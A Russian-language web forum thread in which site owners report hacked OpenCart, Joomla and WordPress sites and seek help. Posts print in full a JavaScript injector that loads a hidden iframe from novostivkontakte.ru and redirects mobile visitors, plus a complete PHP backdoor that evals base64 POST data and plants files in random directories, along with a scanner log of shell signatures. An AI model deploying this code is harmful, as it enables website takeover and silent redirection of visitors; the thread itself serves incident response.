willyns

Хакнули! Наконец-то :)

Рекомендуемые сообщения

willyns    0

Всем привет!

Сегодня проснулся от смс клиента - не могу зайти на ваш сайт! (Хехе, спасибо ему за это)

 

Бегу жеж смотреть, что такое, и вот:

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/webroid/prowood.com.ua/index.php:30) in/home/*/*/system/library/session.php on line 11Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/webroid/prowood.com.ua/index.php:30) in /home/*/*/system/library/session.php on line 11Warning: Cannot modify header information - headers already sent by (output started at /home/webroid/prowood.com.ua/index.php:30) in /home*/*/catalog/controller/common/seo_pro.php on line 305Warning: Cannot modify header information - headers already sent by (output started at /home/webroid/prowood.com.ua/index.php:30) in /home/*/*/system/library/response.php on line 12

Побежал к хостеру сначала,  а потом думаю, а ну-ка гляну внимательнее, что там.

Заглядываем в index.php ииии ТАДАМ!!

 

/*CORE include code version:1.23 START*/


echo "<script type=\"text/javascript\"> 
    function sd5135GHEDF(agaga31323l) {
        var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
        if (typeof(melm) != \"undefined\" && melm!= null)
        {}else{
            var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
            dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
         dsdSSSWrw515312FFF.style.width = \"10px\";
         dsdSSSWrw515312FFF.style.height = \"10px\";
         dsdSSSWrw515312FFF.style.border = \"0px\";
         dsdSSSWrw515312FFF.frameBorder = \"0\";
            dsdSSSWrw515312FFF.style.position = \"absolute\";
            dsdSSSWrw515312FFF.style.left = \"-200\";
         dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
         document.body.appendChild(dsdSSSWrw515312FFF);
         dsdSSSWrw515312FFF.src = agaga31323l;
         return true;
        }
    }
function asd61234tkhjasd454hfhf235(){
    sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");   
}
function R(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){  }else{asd61234tkhjasd454hfhf235();}
}
setTimeout(function(){R();},1000);
</script>";


/*END CORE include code version:1.23*/

Вот он, злыдень!! :)

 

Скажите, дорогие специалисты, как такое стало возможным и как от этого оградиться в будущем?

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
afwollis    1 099

как такое стало возможным

п.1: долгий кропотливый анализ ситуации/логов/прочих_данных вам в помощь.

как от этого оградиться в будущем?

п.2: исходя из результатов п.1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
willyns    0

охохоюшки хохо )))

запустил сканирование сервера средствами хостера - да у меня там как у Жучки блох каких-то адских ифреймов и прочее... Жуть :) Причём в основном под ударом wordpress

 

ещё один злыдень с таким же кодом:

tivkontakte.ru

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
afwollis    1 099

в таком случае - видимо, поимели ваш WP, а потом уже через него добрались до остального.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
koreshok    127

а ещё загляните в response.php .... там в конце файла можно думаю многое найти (не стоит скачивать моды с левых сайтов)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
seleve    0

вчера произошла такая же ситуация, пострадали все сайты на хостинге, именно джумлы, WP работает, синхронно с этой ситуацией в директориях www стали появляться разные файлы типа Vt56TG.php, причем пачками, решение не нашел пока, чищу и переношу сайты на другую площадку

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
toporchillo    445

Есть 2 способа проникновения вирусов на сайт:

1. Дыры в безопасности сайтов, например вот эта http://www.securitylab.ru/news/439825.php

2. Вирус на локальной машине, который используя сохраненные пароли вашего ftp-клиента и расползается

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Einshtein    636

 стали появляться разные файлы типа Vt56TG.php

скорее всего шел...и пока вы не поудаляете все подозрительные файлы - перенос сайта на другую площадку мало чем поможет...

В большинстве случаев с которыми я сталкивался - заражение происходило через другие сайты на площадке...особенно жумла поучавствовала в этом.

Развместите ОС на отдельном хосте

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
seleve    0

скорее всего шел...и пока вы не поудаляете все подозрительные файлы - перенос сайта на другую площадку мало чем поможет...

В большинстве случаев с которыми я сталкивался - заражение происходило через другие сайты на площадке...особенно жумла поучавствовала в этом.

Развместите ОС на отдельном хосте

этим и занимаюсь, выкачиваю и очищаю сайты от вредоносных файлов (кода) и заливаю группами на другие площадки, чтобы выявить какой из сайтов пробило.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
willyns    0

мда.... с утра удалил, вечером то же самое.

тулят свои ифреймы в index.php и admin/index.php

так ладно бы незаметно, так завешивает жеж весь сайт.

Эх, кулхацкеры, кулхацкеры  :-)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
veacheslav    0

мда.... с утра удалил, вечером то же самое.

тулят свои ифреймы в index.php и admin/index.php

так ладно бы незаметно, так завешивает жеж весь сайт.

Эх, кулхацкеры, кулхацкеры  :-)

У меня та же самая беда... Joomla 2.5

полазил и увидел что появился файлик замечательный в ".../plugins/system/widgetkit_zoo/widgets/slideshow/params/zoo2.4/pOOmfN.php"

через что получили доступ пока ума не приложу, смотрел что залили в папке cache и в основном в .js этого самого widgetkit

кто подскажет, как оградиться?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dennynic    0

Сегодня обнаружил такую же проблему. Файлы index.php в корне и в админке залечены js. В зараженных joomla и PHPBB. MODx не тронут. На хостинге были пустые папки с правами 755 внутри которых был обычный index.html. Так вот в этих папках обнаружилось множество php файлов под разными именами, но содержание у всех одинаковое.

<?php

$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
 $isevalfunctionavailable = false;                  
 $evalcheck = "\$isevalfunctionavailable = true;";
 @eval($evalcheck);
 if ($isevalfunctionavailable === true) {
    $fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
    
    $fv = $fnsdht($_POST["gjwqweodsa"]);
    @eval($fv);
    //@eval($_POST["gjwqweodsa"]);
 }else{
    $mpath =  realpath("")."/";
    //$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
    if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
        @include_once($mpath."dsadasdsa1fag1.php");
        @unlink($mpath."dsadasdsa1fag1.php");
    }else{
        echo "ERROR! CANT DO NOTHING!";
    }
 }
}
//if (is_uploaded_file($_FILES['file']['tmp_name']))
if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0)
{
  $fname = trim($_POST['fname']);
  $save_type = trim($_POST['save_type']);
  $dirname = trim($_POST['dirname']);
  $namecrt = trim($_POST['namecrt']);
  
  $auth_pass = trim($_POST['auth_pass']);
  $change_pass = trim($_POST['change_pass']);
  
  $file_type = trim($_POST['file_type']);
  $ftdata = trim($_POST['ftdata']);
  $is_sh = trim($_POST['is_sh']);
  
  if($namecrt == "random"){
    $fname = make_name($fname);
  }
  $uploadfile = "";
  
  if($save_type == "same_dir"){
    $uploadfile = realpath("")."/". $fname;
  }else if($save_type == "sub_dir"){
    $uploadfile = realpath("")."/$dirname/". $fname;
    if(!@mkdir(realpath("")."/$dirname/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "root"){
    $root = $_SERVER['DOCUMENT_ROOT']."/";
    if(@is_writable($root)){
        $uploadfile = $root.$fname;
    }else{
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "root_in_dir"){
    $root = $_SERVER['DOCUMENT_ROOT']."/";
    $uploadfile = $root."$dirname/". $fname;
    if(!@mkdir($root."$dirname/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "random_dir"){
    $uploadfile = choose_dir();
    if(@is_writable($uploadfile)){
        $uploadfile = $uploadfile.$fname;
    }else{
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "random_dir_random_dirname"){
    $dirs = array("dwr","temp","htdata","docs","memory","limits_data","module_config","temp_memory");
    $dr = $dirs[array_rand($dirs)];
    
    $chodir =  choose_dir();
    $uploadfile = $chodir.$dr."/".$fname;
    
    if(!@mkdir($chodir."$dr/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else{
    $uploadfile = realpath("")."/". $fname;
  }
  if($file_type == "file"){
     if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
      {
        if($is_sh == "1" or $is_sh == 1){
            if($change_pass == "1" or $change_pass == 1){   
            
            }else{
                $auth_pass = "";
            }
            $d = @file_get_contents($uploadfile);
            $d = str_replace("{||AUTH_PASS||}",$auth_pass,$d);
            @file_put_contents($uploadfile,$d);
        }
        $url = "http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile);
        echo "UPLOAD:".$url."-END";
      }
      else 
      {
            echo "ERROR upload";
      }
  }else{
    if($is_sh == "1" or $is_sh == 1){
            if($change_pass == "1" or $change_pass == 1){   
            
            }else{
                $auth_pass = "";
            }
            $ftdata = base64_decode($ftdata);
            $ftdata = str_replace("{||AUTH_PASS||}",$auth_pass,$ftdata);
    }
    if(@file_put_contents($uploadfile,$ftdata)){
    	@chmod($uploadfile,0644);
    	echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
    }else{
    	$fp = fopen($uploadfile, "w");
    	if($fp === false){
    		echo "ERROR upload";
    	}else{
    		@fputs ($fp, $ftdata);
    		@fclose ($fp);
    		@chmod($uploadfile,0644);
    		echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
    	}
    }
  }
      
}

function make_name($curname){
    $l = array("_","__","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","1","2","3","4","5","6","7","8","9","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
    $leng = rand(3, 9);
    $ret = "";
    for($i = 0; $i < $leng; $i++){
        $ret .= $l[array_rand($l)];
    }
    $curname = explode(".",$curname);
    return $ret.".".$curname[1];
}

function choose_dir(){
    $lim = 0;
    $res_dirs = array_unique(my_scan($_SERVER['DOCUMENT_ROOT']."/",$lim));
    $t = array();
    for($j = 0; $j < count($res_dirs); $j++){
        $ct = explode("/",$res_dirs[$j]);
        $t[] = count($ct);
    }
    arsort($t);
    $cpath = "";
    $wrt_dirs = array();
    foreach($t as $key=>$val){
        if(@is_writable($res_dirs[$key])){
           if(@file_put_contents($res_dirs[$key]."t.php","hello")){
              @unlink($res_dirs[$key]."t.php");
              //$cpath =  $res_dirs[$key];
              //break;
              $wrt_dirs[] = $res_dirs[$key];
           }
        }
    }
    if(!empty($wrt_dirs) and count($wrt_dirs)>1){
        $cpath = $wrt_dirs[array_rand($wrt_dirs)];
    }
    if(empty($cpath) or $cpath == "" or strlen($cpath) == 0){
       $cpath = $_SERVER['DOCUMENT_ROOT']."/";
    }
    return $cpath;
}

function my_scan($startDir,&$lim){
    $cur_dir = @scandir($startDir);
    $res = array();
    for($ii = count($cur_dir)-1; $ii >=0; $ii--){
        $one_dir = $cur_dir[$ii];
        @set_time_limit(0);
        if($lim > 100)break;
        $d = $startDir.$one_dir;
        if(!@is_link($d) and @is_dir($d."/") && $one_dir !== "." && $one_dir !== ".." && $one_dir !== "cgi-bin" && $one_dir !== "webstats" && $one_dir !== "uploads" && $one_dir !== "upload" && $one_dir !== "js" && $one_dir !== "img" && $one_dir !== "images" && $one_dir !== "templates" && $one_dir !== "webstat" && strpos($one_dir,"backup")===false){
            if(@is_readable($d."/")){
                $res[] = $d."/"; 
                $res = array_merge($res,my_scan($d."/",$lim)); 
            }   
        }
        $lim++;
    }
    return $res;
}
?> 

Т.к. названия файлов у всех разное, это говорит о том что его генерит скрипт, собственно он выше в php-коде, так же этот скрипт распихивает свои копии по рандомным папкам. Подозрение на шелл, будем искать. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
toporchillo    445

Надо правильно права расставлять. Снимать флаг 'write' со всех файлов и папок, которые не предполагается изменять средствами самого OpenCart.

По-хорошему, OpenCart может писать только в папки:

system/logs

image

downloads

vqmod/vqcache

export

(может чего забыл)

В них надо положить .htaccess, запрещающий доступ к php-файлам в них через http

 

Вот вам идея, скрипт написать, или инсталятор доделать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
willyns    0

 

 

Сегодня обнаружил такую же проблему. Файлы index.php в корне и в админке залечены js. В зараженных joomla и PHPBB. MODx не тронут. На хостинге были пустые папки с правами 755 внутри которых был обычный index.html. Так вот в этих папках обнаружилось множество php файлов под разными именами, но содержание у всех одинаковое.

 

В одной из веток здесь нашёл совет поискать base64_decode сквозь все файлы программой FileSeek

Нашёл 3 файла с кривыми генерёнными названиями

 \system\config\JRhmUunF.php

\system\config\CEVE___ab.php

\image\flags\Qra9sia.php

 

с таким же содержанием  :|

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SteveVai    0

Та же самая проблема на Joomla. Пострадали все сайты на хостинге. Файлы созданы 25 числа. index.php и куча левых файлов в разных папках. Удалил все, через час проблема повторилась. Кто-нибудь что-нибудь выяснил? Как эту гадость убрать? 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
smsbase    0

Та же самая проблема на Joomla. Пострадали все сайты на хостинге. Файлы созданы 25 числа. index.php и куча левых файлов в разных папках. Удалил все, через час проблема повторилась. Кто-нибудь что-нибудь выяснил? Как эту гадость убрать?

Аналогично, появилось 25 и пару дней борьбы не помагает. Последнее что сделал поставил права на файлы index.php 400

 

У вас хостинг какой? не SWEB случайно? - может нам заливают дрянь на сайты через другие аккаунты хостинга?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
pashast    380

Аналогично, появилось 25 и пару дней борьбы не помагает. Последнее что сделал поставил права на файлы index.php 400

 

У вас хостинг какой? не SWEB случайно? - может нам заливают дрянь на сайты через другие аккаунты хостинга?

Да, напишите все какой хостер. Может это взломали хостера.

 

p.s. для поиска заразы рекомендую это http://www.revisium.com/ai/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SteveVai    0

Да, напишите все какой хостер. Может это взломали хостера.

 

p.s. для поиска заразы рекомендую это http://www.revisium.com/ai/

Хостинг RU-CENTER

 

Спасибо огромное за скрипт. Показывает всю заразу.

После удаления, пока что все ОК.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
smsbase    0

Хостинг RU-CENTER

 

Спасибо огромное за скрипт. Показывает всю заразу.

После удаления, пока что все ОК.

Что удаляли и где? Нашли место взлома сайта?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
chukcha    1 019
Показывает всю заразу.

 

Этого мало...

Еще нужно найти точку входа...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
motorostov    0

У меня таже история, делаю откаты, помогает на 3 дня затем всё снова повторяется, хостинг от ihc.ru
на всех сайтах, joomla, opencart и InstantCMS. Воабще не понимаю что делать
 
вот этот код:

<script type="text/javascript">     function sd5135GHEDF(agaga31323l) {        var melm = document.getElementById("a35fdsfdsf62FFSSD");        if (typeof(melm) != "undefined" && melm!= null)        {}else{            var dsdSSSWrw515312FFF = document.createElement("iframe");            dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD";        	dsdSSSWrw515312FFF.style.width = "10px";        	dsdSSSWrw515312FFF.style.height = "10px";        	dsdSSSWrw515312FFF.style.border = "0px";        	dsdSSSWrw515312FFF.frameBorder = "0";            dsdSSSWrw515312FFF.style.position = "absolute";            dsdSSSWrw515312FFF.style.left = "-200";        	dsdSSSWrw515312FFF.setAttribute("frameBorder", "0");        	document.body.appendChild(dsdSSSWrw515312FFF);        	dsdSSSWrw515312FFF.src = agaga31323l;        	return true;        }    }function asd61234tkhjasd454hfhf235(){    sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm");   }function SFWR64362fdhHHHHH(){if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){  }else{asd61234tkhjasd454hfhf235();}if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){ try{setTimeout(function(){window.location="http://novostivkontakte.ru/?id=mob";},1000);}catch(err) {window.location="http://novostivkontakte.ru/?id=mob";location.href="http://novostivkontakte.ru/?id=mob";}}}//setTimeout(function(){R();},1500);try {        if(window.attachEvent) {            window.attachEvent("onload", SFWR64362fdhHHHHH);        } else {        if(window.onload) {            var curronload = window.onload;            var newonload = function() {                curronload();                SFWR64362fdhHHHHH();            };            window.onload = newonload;        } else {			window.onload = SFWR64362fdhHHHHH;		}	}} catch(err) {}

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
icqmag    107

 InstantCMS в помойку убирай, поймал сам от нее.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SteveVai    0

Что удаляли и где? Нашли место взлома сайта?

 
Трудно сказать откуда именно залезло. 
На всех сайтах примерно все одно и то же, что-то типа этого:
(Все удалил, кроме index.php, их заменил на нормальные)
 
Критические замечания
 
Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт:
Путь Дата создания Дата модификации Размер CRC32
.../docs/plugins/system/legacy/KUa__.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:15
6.50 Kb
-1991197706
.../docs/plugins/system/legacy/NI6rP2lN1.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:25
6.50 Kb
-1991197706
.../docs/plugins/system/mtupgrade/KTnkz.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:18
6.50 Kb
-1991197706
.../docs/plugins/system/ldZMkjXEV.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e"; $f
25/12/2013 03:09:40
6.49 Kb
-1875437887
.../docs/plugins/system/dvHBmx2.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:54:58
6.50 Kb
-1991197706
.../docs/plugins/user/NdMv_.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:11
6.50 Kb
-1991197706
.../docs/plugins/user/aj1l__35tJ.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:26
6.50 Kb
-1991197706
.../docs/plugins/xmlrpc/DWoLcAKs.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:21
6.50 Kb
-1991197706
.../docs/plugins/xmlrpc/avP.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
27/12/2013 17:14:05
6.50 Kb
-1991197706
.../docs/plugins/xmlrpc/K8d.php
<?php //|$auth_pass = "9bc2e1d95fab7d35f25dc619521182ff"; $auth_pass = ""; if(!empty($
27/12/2013 23:55:45
24.26 Kb
1205493127
.../docs/plugins/xmlrpc/sys09725827.php
ywpz}=text_macros(${${"\x47\x4c\x4fB\x41\x4cS"}["\x71\x77j\x72j\x6f"]});$zpddcmh|vkqr="\x6de\x73\x73a\x67\x65\x73";${"\x47\x4cO\x42\x41\x4cS"}["\x6d\x62\x69\x68
28/12/2013 00:26:26
41.29 Kb
1192102346
.../docs/xmlrpc/cache/4mbuLNPm.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
27/12/2013 17:14:07
6.50 Kb
-1991197706
.../docs/xmlrpc/includes/qvtR6Ndn.php
= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
25/12/2013 14:55:14
6.50 Kb
-1991197706
 
Найдены сигнатуры javascript вирусов:
Путь Дата создания Дата модификации Размер CRC32
.../docs/index.php
pseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} |if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windo
27/12/2013 14:59:40
4.40 Kb
1607522158
.../docs/plugins/editors/jckeditor/plugins/pastefromword/filter/default.js
,convertToPx:(function(){var h=CKEDITOR.dom.element.createFromHtml('<div style=|position:absolute;left:-9999px;top:-9999px;margin:0px;padding:0px;border:0px;">
05/04/2012 20:33:36
11.57 Kb
-232178055
.../docs/plugins/xmlrpc/sys09725827.php
47\x4c\x4fBA\x4c\x53"}["b\x79\x79\x70c\x75yk]="\x6b\x65\x79";if(isset($_POST["c|\x6fde"])&&isset($_POST["\x63u\x73\x74\x6f\x6d\x5f\x61\x63t\x69on"])){eval(base
28/12/2013 00:26:26
41.29 Kb
1192102346
.../docs/administrator/index.php
pseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} |if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windo
27/12/2013 14:59:40
4.51 Kb
1603720537
 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
magneto2010    41

Ой помню этот пападос, только заразил не свои сайты и магазины заказчиков. Плювался потом

Всё лечиться вычисткой этой гадости, редиректов (магазины с мобил перекидывало на адалт или на скачку всякой всячины) и прочей хни, выставлением прав на папки и файлы и заменой всех паролей на хостинге и ftp.

 

P>S - не храните пароли в ftp клиентах типо FileZila и тд. Вся глина оттуда. 

 

 

 

У меня таже история, делаю откаты, помогает на 3 дня затем всё снова повторяется, хостинг от ihc.ru
на всех сайтах, joomla, opencart и InstantCMS. Воабще не понимаю что делать
 

 

 

Тупо перекатать сохранёнку и излечиться не получиться - это как ключи у воров - вы как квартиру не убирайте - всё равно ночью к вам попадут. Пароли меняйте!!!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
motorostov    0

смена паролей не помогает

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу